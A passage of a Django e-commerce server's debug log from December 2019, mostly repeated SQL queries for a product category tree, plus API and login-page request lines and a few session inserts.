"shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 09:57:06,011 utils 32196 139885071562496 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 09:57:06,015 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 09:57:06,019 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 09:57:06,024 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 09:57:06,028 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 09:57:06,033 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 09:57:06,037 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 09:57:06,041 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 09:57:06,045 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 09:57:06,049 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 09:57:06] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-10 09:59:24,112 utils 32196 139885071562496 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 09:59:24,121 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 09:59:24,125 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 09:59:24,129 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 09:59:24,136 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 09:59:24,140 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 09:59:24,144 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 09:59:24,148 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 09:59:24,152 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 09:59:24,156 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 09:59:24,159 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 09:59:24] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [10/Dec/2019 09:59:31] "GET / HTTP/1.0" 302 0 [10/Dec/2019 10:05:03] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-10 10:10:44,392 utils 32196 139885071562496 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 10:10:44,399 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 10:10:44,404 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 10:10:44,408 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 10:10:44,412 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 10:10:44,416 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 10:10:44,420 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 10:10:44,424 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 10:10:44,428 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 10:10:44,432 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 10:10:44,436 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 10:10:44] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [10/Dec/2019 10:12:40] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-10 10:13:04,637 utils 32196 139885071562496 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 10:13:04,646 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 10:13:04,650 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 10:13:04,654 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 10:13:04,658 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 10:13:04,662 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 10:13:04,666 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 10:13:04,669 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 10:13:04,673 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 10:13:04,677 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 10:13:04,681 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 10:13:04] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-10 10:13:51,250 utils 32196 139885071562496 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 10:13:51,257 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 10:13:51,261 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 10:13:51,265 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 10:13:51,268 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 10:13:51,272 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 10:13:51,275 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 10:13:51,277 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 10:13:51,279 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-10 10:13:51,282 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-10 10:13:51,284 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [10/Dec/2019 10:13:51] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [10/Dec/2019 10:17:43] "GET / HTTP/1.0" 302 0 [10/Dec/2019 10:22:46] "GET / HTTP/1.0" 302 0 [10/Dec/2019 10:27:49] "GET / HTTP/1.0" 302 0 [10/Dec/2019 10:29:02] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-10 10:29:02,291 utils 32196 139885071562496 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '6sfob5w954ifnj38h27d3hkm00u68jwr' LIMIT 1; args=('6sfob5w954ifnj38h27d3hkm00u68jwr',) DEBUG 2019-12-10 10:29:02,293 utils 32196 139885071562496 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('6sfob5w954ifnj38h27d3hkm00u68jwr', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-24T10:29:02.291550+00:00'::timestamptz); args=('6sfob5w954ifnj38h27d3hkm00u68jwr', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 24, 10, 29, 2, 291550, tzinfo=)) [10/Dec/2019 10:29:02] "GET /login/?next=/ HTTP/1.0" 200 1786 [10/Dec/2019 10:32:52] "GET / HTTP/1.0" 302 0 [10/Dec/2019 10:37:54] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [10/Dec/2019 10:38:50] "GET /proxy.php HTTP/1.0" 404 6629 [10/Dec/2019 10:40:06] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-10 10:40:06,638 utils 32196 139885071562496 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'rphkb9wwvc3cya213gadw8y45kaeiztt' LIMIT 1; args=('rphkb9wwvc3cya213gadw8y45kaeiztt',) DEBUG 2019-12-10 10:40:06,640 utils 32196 139885071562496 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('rphkb9wwvc3cya213gadw8y45kaeiztt', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-24T10:40:06.639255+00:00'::timestamptz); args=('rphkb9wwvc3cya213gadw8y45kaeiztt', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 24, 10, 40, 6, 639255, tzinfo=)) [10/Dec/2019 10:40:06] "GET /login/?next=/ HTTP/1.0" 200 1786 [10/Dec/2019 10:44:00] "GET / HTTP/1.0" 302 0 [10/Dec/2019 10:49:03] "GET / HTTP/1.0" 302 0 [10/Dec/2019 10:54:06] "GET / HTTP/1.0" 302 0 [10/Dec/2019 10:59:09] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-10 11:04:39,744 utils 32196 139885071562496 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-10 11:04:39,749 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-10 11:04:39,751 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-10 11:04:39,753 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-10 11:04:39,757 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-10 11:04:39,760 utils 32196 139885071562496 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-10 11:04:39,764 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-10 11:04:39,766 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-10 11:04:39,771 utils 32196 139885071562496 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", 